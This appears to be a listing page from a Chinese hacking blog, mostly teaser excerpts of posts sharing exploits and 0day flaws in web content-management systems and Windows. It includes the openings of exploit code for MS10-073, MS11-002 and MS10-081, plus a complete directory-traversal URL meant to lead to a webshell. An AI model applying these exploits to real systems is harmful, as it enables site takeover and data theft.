================================================================= Phpcms V9 BLind SQL Injection Vulnerability 非常简单的英文,连我这英语不及格的都看得懂…… 囧~ 就不翻译了…… ================================================================= Software: Phpcms V9 Vendor: www.Phpcms.cn Vuln Type: BLind SQL Injection Download link: http://www.Phpcms.cn/2010/1229/326.html Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Google Dork: http://www.exploit-db.com/ghdb/3676/ //check here ^_^ References: http://eidelweiss-advisories.blogspot.com/2011/01/Phpcms-v9-blind-sql-injection.html =================================================================
围观—“著名”90后非主流黑客欧欧博客被黑
“著名”90后非主流黑客欧欧博客被黑,纯属 T00ls.Net 某个普通成员所为,T00ls 众多大牛表示对这次事件毫不不知情,并且 T00ls.Net 不负任何责任。 T00ls.Net 众多大
最近老有垃圾站每天都来采集本站,狗日的!
-------------------------------------------------------------------------------------------- 最近老有垃圾站每天都来采集本站,狗日的! 两个月前发现某些站开始采集,非转载,完完全全的采集,照搬!有多少抄多少,而且从来不带原文地址
【漏洞】MiceCMS 企业网站管理系统 - Exp
作者:心灵 感觉这个洞没什么用,就扔出来共享下,^_^! 不是说这个漏洞鸡肋需要什么条件,而是直接改管理员密码了,等你进后台后,真正的管理
Phpcms 2008 flash_upload.php 注入漏洞
一个小日本今天公布的,自己刚刚去官方测试OK。 漏洞名称:Phpcms 2008 flash_upload.php 文件注入漏洞 针对版本:Phpcms 2008 V2 注入地址:http:/
【技术文章】分析拿下114LA网址导航方法
作者:心灵 纯属分析,并不是漏洞,也可以叫漏洞。 程序文件不多,大致能和用户交换的就是:留言本和网址提交。2个都详细看了几次,按本小菜看来
能直接在眼球上投影图像的隐形眼镜,智子?
大刘的旷世巨作《三体》中,有个设定叫做“智子”,它是先进文明玩的高维度把戏,对三维世界而言不可探测,但是功能极其强大,锁死了人类的物理学,
【视频】过年啦!回家啦!过年回家啦,带女友,女友是充气的!充气的!!!
视频: 过年回家啦,带女友,吃着火锅还唱着歌,女友是充气的,充气的!!! 过年回家啦,带女友,吃着火锅还唱着歌,女友是充气的,充气的!!!~~~
【经验】BT服务器 禁止除80以外所有端口
很BT的服务器,禁止除80以外所有端口,真对这种情况的多种解决方案。 遇到一台很犀利的国内服务器,有 system 权限,apache 运行在 system 下,可以执
【漏洞】EXCMS 卓越内容管理系统 - 0day
作者:心灵 以下版本没测试,测试的是最新版本。在公布前几小时没有通知官方,^_^,哈哈。 为什么说过程精彩呢?看完就明白!因为这个漏洞原因
【漏洞】ESPCMS 易思企业建站系统 0day
以下版本没测试,测试的是最新版本。Google:Powered by ESPCMS,过程有点复杂,耐心看就明白。 看代码:“adminsoft\
【公告】本站部分已失效友情链接摘除通知
今天看了一下,有些友情链接失效了,所以摘除了。在以下列表里有摘除的链接,以及具体原因。本站会不定期检查友情链接,同时也欢迎新朋友前来做友情
T00ls.Net主域名成功转移至Godaddy.Com
oldjun: rt~经过半个月左右的努力,终于成功转移了。 摆脱新网的同时也摆脱了天朝... 小毅: 新网竟然会同意,奇迹啊!!! 可酷可乐: 90后
【技术研究】- 探究新云下载任意文件漏洞
作者:f4tb0y 新云下载任意文件漏洞不是什么新东西了,也爆出过上传 0day:http://www.t00ls.net/thread-5
深圳迪蒙网络科技企业网站管理系统 - 0day
作者:f4tb0y 又名 2h0ngHe 洞很简单(近乎傻瓜),小菜一枚,纯属给检测网站遇到同一系统的同学提供捷径,写得不好还请大牛还不要笑我。 话说某天检
建站之星建站系统 SiteStar V1.3 通杀0day
发布日期:2011-01.15 发布作者:udb311 影响版本:sitestar V1.3 官方网站:http://www.sitestar.cn 漏洞类
建站之星 智能建站系统漏洞 Windows IIS6
作者:xiaocao 声明:此漏洞只适于 Windows IIS6 关键词就自己找吧,我相信有不少的人用了建站之星。还是FCK编辑器造成的,只要是建成了的客户站,都
Exp - MS10-073 Win32k Keyboard Layout
MS10-073: Win32k Keyboard Layout Vulnerability Code: // My koala is staring at you CºgºD // Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1 #include <windows.h> #include <stdio.h> #include <ntsecapi.h> #define MAGIC_OFFSET 0x6261 #define InitializeUnicodeStr(p,s) { \ (p)->Length= wcslen(s)*2; \ (p)->MaximumLength = wcslen(s)*2+2; \ (p)->Buffer = s; \ } _declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx ( IN HANDLE Handle, IN DWORD offTable,
【Exp】MS11-002 网马溢出样本 Html源码
MS11-002: Microsoft Data Access Components Vulnerability(MS11-002:Microsoft 数据访问组件中的漏洞) EDB-ID: 15984 CVE: 2011-0027 OSVDB-ID: N/A Author: Peter Vreugdenhil Published: 2011-01-12 Verified: √ Exploit Code: Vulnerable App: N/A From: http://www.exploit-db.com/exploits/15984/ Co
Exp - 东方网景企业邮箱系统目录遍历漏洞
POC: 目录遍历,如果是子目录的话可以考虑,浏览主目录拿WebShell。 注册登陆邮箱系统 Exp: http://mail.xxxx.com.cn/webmail/emfile?action=file&todo=displayfolderfiles&FileURI=%2F.Files%2F.test/../../../../../../../../../../%2C%2C0 截图如下:
E邮宝去死吧,垃圾快递,速度龟速,超慢!
E邮宝官网查询的信息: 您的邮件于 2011-01-13 14:09:17 离开 西安航站南院 处理中心。 处理时间 &nbs
刚在一网站看见的律师案例介绍 - 陈灏简介
以下内容,只可意会,不可言传……,不敢有敏感词汇,万一收到法院传票那就不好了……,记住:只可意会,不可言传! 声明:以下内容转载于网络,网
每天都要处理T00ls十几个这样的无聊人士
T00ls.Net 帐号申请审核后台: 申请帐号名 传说里的男人 QQ 1759805678 邮箱 1759805678@qq.com 理由 我比你们都帅,能通过不? 啥?不能,你们找个比我帅的,看有没? 没吧,一个都没,这不是很
陕西西安电信公然劫持淘宝主页,强行推广!
啥也不说了,电信这个狗日的,陕西西安电信公然劫持淘宝主页,强行推广淘宝热卖! 这次不骂了,也
再次发掘科威网址导航系统 - 盒子导航漏洞
作者:心灵 纯属看不惯这些修改别人产品去卖钱的。。。。我们要素质,斯文,不说粗口…… 趁着饭没煮好,花几分钟找下漏洞。 科威网址导航系统和
正版逍遥网店系统 V3.0 Cookie 欺骗进后台
BY:风之传说 刚才我挖了一个洞,然后我一个朋友刚好又叫我帮他看源码郁闷又发现了一个~!这人品是咋滴。。 当然还很感谢心灵大牛的指导哈哈~
【Oday】新世纪企业建站系统 V12.7 注射
新世纪企业建站系统 V12.7 注射 Oday,漏洞文件:CompHonorBig.asp。 首先看到了一段代码加密: <%@ LANGUAGE = VBScript.Encode %> <!--#include file="Inc/conn.asp"--> <%#@~^JgAAAA==[b:~bN@#@&k9'Mn;!+dYcp;nMX?D.k o`rr[J*bgwAAA==^#~@%> <html> <head> <tit
Luocms 2.0 文章管理系统添加管理员漏洞
蛋疼的作者……,代码稀少又简单,这也拿去卖钱……,-0-! 这个作者的思想是用户能直接看见的文件就“Session”验证,没有显示东西的就
Ecshop 最新版(v272) 本地包含漏洞 Oday
注:发布本文只是出于学习的目的,请勿用无非法用途! 很久前就发现了,今天发布出来吧,其实很简单,就是很多人没有注意这里: 直接看代码: “js
MS10-081 网马 - Windows Comctl32 溢出
MS10-081: Windows Common Control Library (Comctl32) Heap Overflow,MS10-081 网马: #!/usr/bin/env ruby # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept # Nephi Johnson require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] date_str = Time.now.gmtime.strftime("%a,